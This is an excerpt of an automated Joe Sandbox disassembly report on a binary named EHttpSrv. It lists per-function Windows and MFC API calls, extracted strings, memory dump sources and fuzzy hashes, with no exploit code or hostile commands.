                                                                                                                • Instruction ID: e37fd1f3625893c1c44e5bcf08bd10de1f0668e815bcb2f4157593aa8b119332
                                                                                                                • Opcode Fuzzy Hash: ebad0841af5831171d73bf8388fe049bd1bd72ce455b8242ac7a8760335e44c4
                                                                                                                • Instruction Fuzzy Hash: 3881A3B0504B02ABE311CF24CC85BA7B7B8FF48709F408D1DE9A657391D7B976489B51
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044D4D8
                                                                                                                • #776.MFC80U(20483CF0), ref: 2044D53D
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044D750
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044D791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#314#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 527024662-0
                                                                                                                • Opcode ID: 74c24d0cb461f308b201a75516ed458f182609a21cb2372e90b48c6f5989f4f3
                                                                                                                • Instruction ID: 8dd999ad99c8cdfa40ad9653db68ec9141ca0acd8cbb1f7ca18c7e41612e3f41
                                                                                                                • Opcode Fuzzy Hash: 74c24d0cb461f308b201a75516ed458f182609a21cb2372e90b48c6f5989f4f3
                                                                                                                • Instruction Fuzzy Hash: 5681F271A08A41AFE704DFA4CC44B9ABBE0FB85719F00C61DF59593290DB3CA905CB92
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 2043776B
                                                                                                                • GetSystemMetrics.USER32(00000003), ref: 20437773
                                                                                                                • GetClientRect.USER32(?,?), ref: 20437780
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2043778F
                                                                                                                • #5609.MFC80U(?), ref: 2043779C
                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 204377CA
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 204377DD
                                                                                                                • #6061.MFC80U(00000000,?,?,?,?,00000014), ref: 20437817
                                                                                                                • #6061.MFC80U(00000000,?,?,?,?,00000014,00000000,?,?,?,?,00000014), ref: 20437840
                                                                                                                • InvalidateRect.USER32(76945540,00000000,00000001,00000000,?,?,?,?,00000014,00000000,?,?,?,?,00000014), ref: 2043785E
                                                                                                                • #6086.MFC80U(00000000), ref: 20437875
                                                                                                                • #2155.MFC80U(00000000,00000000), ref: 2043787E
                                                                                                                • SendMessageW.USER32(?,00001207,00000000,?), ref: 2043789A
                                                                                                                • SendMessageW.USER32(?,00001207,-000000FF,?), ref: 204378B2
                                                                                                                • #3395.MFC80U ref: 204378EB
                                                                                                                • #6061.MFC80U(00000000,?,?,?,00000000,00000054), ref: 2043791F
                                                                                                                • #5981.MFC80U(00000002,00000007,00000001), ref: 20437966
                                                                                                                • #2155.MFC80U(00000001,00000002,00000007,00000001), ref: 2043796F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#6061MessageSend$#2155MetricsSystem$#3395#5609#5981#6086ClientInvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3645718903-0
                                                                                                                • Opcode ID: 21ccb586117c78da2a23b02a06aaa101c8c2654ad8c76e7f71005bc749b1e17f
                                                                                                                • Instruction ID: 6873d10806194d77a4cfca0b4f43bae2f31d94951606afd11c3252bb2f2f83c1
                                                                                                                • Opcode Fuzzy Hash: 21ccb586117c78da2a23b02a06aaa101c8c2654ad8c76e7f71005bc749b1e17f
                                                                                                                • Instruction Fuzzy Hash: CC613C71648700AFD304CB64CD85F6BB7E9ABC8B08F008A1DF69597290DAB4E905CB52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$wcscpy_swcsncpy_s$_snwprintf_s
                                                                                                                • String ID: IP6_ADDR
                                                                                                                • API String ID: 2905155339-1561260847
                                                                                                                • Opcode ID: 47e3fe825613e1b6450fc5c50a4a0ad2b13a8b7b0fc8793c4d52f362dca36199
                                                                                                                • Instruction ID: e2a72aac4db4876480e7d1603feb0957049e14262460354dd65782d59b7c11bc
                                                                                                                • Opcode Fuzzy Hash: 47e3fe825613e1b6450fc5c50a4a0ad2b13a8b7b0fc8793c4d52f362dca36199
                                                                                                                • Instruction Fuzzy Hash: 9A412D30404B22BBC310AB98CC89E1F76AAEFC131AF14CA3DF51263295DB6E651586D6
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 20445AB2
                                                                                                                • strcpy_s.MSVCR80 ref: 20445AD8
                                                                                                                • strcat_s.MSVCR80 ref: 20445AEF
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,-00000001,?,00000008), ref: 20445AFF
                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B0D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,-00000001,?,00000008), ref: 20445B18
                                                                                                                • strcpy_s.MSVCR80 ref: 20445B30
                                                                                                                • strcat_s.MSVCR80 ref: 20445B41
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 20445B4B
                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B5F
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 20445B66
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 20445B7C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressProc$FreeLoadstrcat_sstrcpy_s$DirectorySystem
                                                                                                                • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                                • API String ID: 1002071407-3078833738
                                                                                                                • Opcode ID: 7049ffa7209eaf4601507fc619209b423472e0dc5b36286b745ed577acdaf74b
                                                                                                                • Instruction ID: 11f288673e82c687b43bf6052560b49ad4e3b1d551902d6b513d8f73b389c7dc
                                                                                                                • Opcode Fuzzy Hash: 7049ffa7209eaf4601507fc619209b423472e0dc5b36286b745ed577acdaf74b
                                                                                                                • Instruction Fuzzy Hash: 8A4191715097419BD310EFA5CCC4A9BBBE8EBC8744F40CD2DE54497251EB7CEA048B96
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2045AEFE
                                                                                                                • malloc.MSVCR80 ref: 2045AF09
                                                                                                                • #1176.MFC80U(?,?,?,00000000), ref: 2045AF89
                                                                                                                • free.MSVCR80 ref: 2045B00D
                                                                                                                • malloc.MSVCR80 ref: 2045B01D
                                                                                                                • #3873.MFC80U(00000001,000000FF,?,00000000,00000000,00000000,00000000), ref: 2045B090
                                                                                                                • #5862.MFC80U(000000FF,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000001,000000FF,?,00000000,00000000,00000000,00000000), ref: 2045B0AB
                                                                                                                • #5862.MFC80U(000000FF,00000000,00000004,00000000,00000000,00000000,00000000,?,000000FF,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 2045B0C3
                                                                                                                • CertGetNameStringW.CRYPT32(?,00000004,00000001,00000000,00000000,00000000), ref: 2045B14E
                                                                                                                • free.MSVCR80 ref: 2045B184
                                                                                                                • malloc.MSVCR80 ref: 2045B191
                                                                                                                • CertGetNameStringW.CRYPT32(?,00000004,00000001,00000000,00000000,00000080), ref: 2045B1DA
                                                                                                                • #5862.MFC80U(000000FF,00000001,00000001,00000000,00000000,00000000,00000000,00000000), ref: 2045B1FE
                                                                                                                • free.MSVCR80 ref: 2045B25E
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 2045B280
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 2045B295
                                                                                                                • SendMessageW.USER32(?,0000101E,00000002,0000FFFE), ref: 2045B2AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#5862freemalloc$CertNameString$#1176#3873
                                                                                                                • String ID:
                                                                                                                • API String ID: 2005483445-0
                                                                                                                • Opcode ID: f6091f5a1c2f201371206002669792c78905fec26cb7a3506b44a1ce23e23444
                                                                                                                • Instruction ID: 7aa81ce3c81966263314b35946536dfc2b25f7b097feda67f60f561cf53201e5
                                                                                                                • Opcode Fuzzy Hash: f6091f5a1c2f201371206002669792c78905fec26cb7a3506b44a1ce23e23444
                                                                                                                • Instruction Fuzzy Hash: 18C161B1B40605ABDB10CF94CC85FED7BB5AF58708F148169FA04AF391C7B9A945CBA0
                                                                                                                APIs
                                                                                                                • #762.MFC80U(00000040,FEEA6C22,?,?,76945540,?,00000000,2047CE6B,000000FF,2041340D,00000000,?,00000000), ref: 20420E6E
                                                                                                                • #764.MFC80U(?), ref: 20420EBE
                                                                                                                • #764.MFC80U(?), ref: 20420ED7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 20420F4E
                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 20420F5B
                                                                                                                • UpdateWindow.USER32(?), ref: 20420F61
                                                                                                                • #1176.MFC80U(FEEA6C22,?,?,76945540,?,00000000,2047CE6B,000000FF,2041340D,00000000,?,00000000), ref: 20420F7C
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 20420FE7
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 20421006
                                                                                                                • #2362.MFC80U(00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 2042100D
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 2042101F
                                                                                                                • SendMessageW.USER32(?,0000102C,?,00000002), ref: 2042103C
                                                                                                                • #5867.MFC80U(?,00000000,00000002,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 2042105C
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204210A1
                                                                                                                • #5867.MFC80U(?,00000002,00000002,?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204210D9
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204210EE
                                                                                                                • #2361.MFC80U(?,?,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 2042111E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2361$MessageSend$#5867#764Object$#1176#2362#762CurrentUpdateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2351648720-0
                                                                                                                • Opcode ID: 672f647bf08ec23234bc2087f0e45b13ee6fb693e93c213341d5d513fe22b25d
                                                                                                                • Instruction ID: 9e60b9e9ee0762daa73f16079c96528702c899e64c1e2e01d0807964c78369a3
                                                                                                                • Opcode Fuzzy Hash: 672f647bf08ec23234bc2087f0e45b13ee6fb693e93c213341d5d513fe22b25d
                                                                                                                • Instruction Fuzzy Hash: ECB1A171604B809FD324CFA9D980B67BBE4BF58704F40891DE68A87B61D778F944CBA1
                                                                                                                APIs
                                                                                                                • #501.MFC80U(?,FEEA6C22), ref: 20434EF7
                                                                                                                • #2521.MFC80U(?,?,FEEA6C22), ref: 20434F0E
                                                                                                                • #347.MFC80U(?,?,FEEA6C22), ref: 20434F17
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 20434F29
                                                                                                                • #1270.MFC80U(00000000), ref: 20434F34
                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 20434F45
                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 20434F86
                                                                                                                • #1271.MFC80U(00000000), ref: 20434F91
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 20434FA0
                                                                                                                • GetMapMode.GDI32(?,?,?,00000000), ref: 20434FAC
                                                                                                                • #5884.MFC80U(00000000), ref: 20434FB7
                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 20434FC8
                                                                                                                • #6058.MFC80U(?,?,?), ref: 20434FE1
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 20435023
                                                                                                                • #5633.MFC80U(?,00000000), ref: 20435036
                                                                                                                • #602.MFC80U(?,00000000), ref: 20435068
                                                                                                                • #709.MFC80U(?,00000000), ref: 2043507C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5633CompatibleCreate$#1270#1271#2521#347#501#5884#602#6058#709BitmapMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 1373658176-0
                                                                                                                • Opcode ID: c34cfe65f2e81302b6606f60459f7e002a2ad8293115252f17f7a2094577e07d
                                                                                                                • Instruction ID: a83816640fc43899ab8bedff050c7f80ea9979f3e0078e773df583a019831a82
                                                                                                                • Opcode Fuzzy Hash: c34cfe65f2e81302b6606f60459f7e002a2ad8293115252f17f7a2094577e07d
                                                                                                                • Instruction Fuzzy Hash: 63510A71108380AFC314CBA4C895FABBBF9FBD9614F408A1DF59597290DB35A904CBA2
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20454F37
                                                                                                                • #2651.MFC80U(000004DD), ref: 20454FB1
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 20454FC9
                                                                                                                • #2651.MFC80U(00000418), ref: 20454FD2
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 20454FE4
                                                                                                                • #2651.MFC80U(00000418), ref: 20454FFA
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 20455012
                                                                                                                • #2651.MFC80U(000004DD), ref: 2045501B
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 2045502D
                                                                                                                • #2651.MFC80U(00000419), ref: 2045503B
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 20455053
                                                                                                                • #2651.MFC80U(000004DD), ref: 2045505C
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 2045506E
                                                                                                                • #2651.MFC80U(00000418), ref: 20455077
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 20455089
                                                                                                                • #6232.MFC80U(00000000), ref: 2045508F
                                                                                                                • #6751.MFC80U(00000000,?,00000000), ref: 204550C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651MessageSend$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 2120556010-0
                                                                                                                • Opcode ID: 00c5c4d9388734689ff230a2c2ad7f1d8935393552846ac86e096f6d73856075
                                                                                                                • Instruction ID: 400493f18f7f61b9d9f6c8aa757d2f0e415e25ab5d97b307948fb031a99fd79b
                                                                                                                • Opcode Fuzzy Hash: 00c5c4d9388734689ff230a2c2ad7f1d8935393552846ac86e096f6d73856075
                                                                                                                • Instruction Fuzzy Hash: CC519371384706AFD724DB608C52FAA7BA4AB94F04F50861CF2542F6D0CFB8A805CB95
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,20459A70,00000000), ref: 20459B84
                                                                                                                • #2651.MFC80U(000003FE), ref: 20459BB5
                                                                                                                • #2155.MFC80U(000003FE), ref: 20459BBC
                                                                                                                • #2651.MFC80U(0000049F,?,000003FE), ref: 20459BC9
                                                                                                                • #2155.MFC80U(0000049F,?,000003FE), ref: 20459BD0
                                                                                                                • #2651.MFC80U(00000479,?,0000049F,?,000003FE), ref: 20459BDD
                                                                                                                • #2155.MFC80U(00000479,?,0000049F,?,000003FE), ref: 20459BE4
                                                                                                                • #2651.MFC80U(000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459BF1
                                                                                                                • #2155.MFC80U(000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459BF8
                                                                                                                • #2651.MFC80U(000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C05
                                                                                                                • #2155.MFC80U(000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C0C
                                                                                                                • #2651.MFC80U(000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C19
                                                                                                                • #2155.MFC80U(000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C20
                                                                                                                • #2651.MFC80U(000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C2D
                                                                                                                • #2155.MFC80U(000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C34
                                                                                                                • #2651.MFC80U(000003F7,?,000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C41
                                                                                                                • #2155.MFC80U(000003F7,?,000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: f18dba61e3397a45a84501a188c387c4ade9fb1771f5a5cd87d6bd45c25fe1b6
                                                                                                                • Instruction ID: b5f15e1a3d2d9f20017a06a8e2974cef47318a9224f4a602365c315b078bc4fe
                                                                                                                • Opcode Fuzzy Hash: f18dba61e3397a45a84501a188c387c4ade9fb1771f5a5cd87d6bd45c25fe1b6
                                                                                                                • Instruction Fuzzy Hash: EB11A8607C065157D95A23B15C2AFBF15AA8BE2E0CF80C52CB2425FAF0DE6C8D068355
                                                                                                                APIs
                                                                                                                • #3395.MFC80U ref: 2045D1B0
                                                                                                                • GetClientRect.USER32(?,?), ref: 2045D1C5
                                                                                                                • BeginDeferWindowPos.USER32(00000000), ref: 2045D1DB
                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 2045D1F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$#3395BeginClientRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3239882827-3916222277
                                                                                                                • Opcode ID: fc394b92ffa3647cce4dac8b4896ce4752b666bd29a0a9cdc9c3fc3ebb51db73
                                                                                                                • Instruction ID: 034aadabd89f1504db7cc2445e4d788f2b944d61817344f63716ab64c38942e8
                                                                                                                • Opcode Fuzzy Hash: fc394b92ffa3647cce4dac8b4896ce4752b666bd29a0a9cdc9c3fc3ebb51db73
                                                                                                                • Instruction Fuzzy Hash: 3BC158716047019FC714CF68C984A5ABBF1BF99258F04CA2CF98997755D738EC49CB82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID: DESC$DWORD$OPTION;OPTNAME=%s$OPTIONS$OPTNAME$SETTINGS$TYPE$VALUE$xXH
                                                                                                                • API String ID: 441403673-3842691247
                                                                                                                • Opcode ID: 44759ae7967cd5d754631de882d4850044f044f1689e997cc1386254ff75ca69
                                                                                                                • Instruction ID: bb8fcba937c8b7826b6e61e985063486853f44c02f1705573b680c95f00d62d2
                                                                                                                • Opcode Fuzzy Hash: 44759ae7967cd5d754631de882d4850044f044f1689e997cc1386254ff75ca69
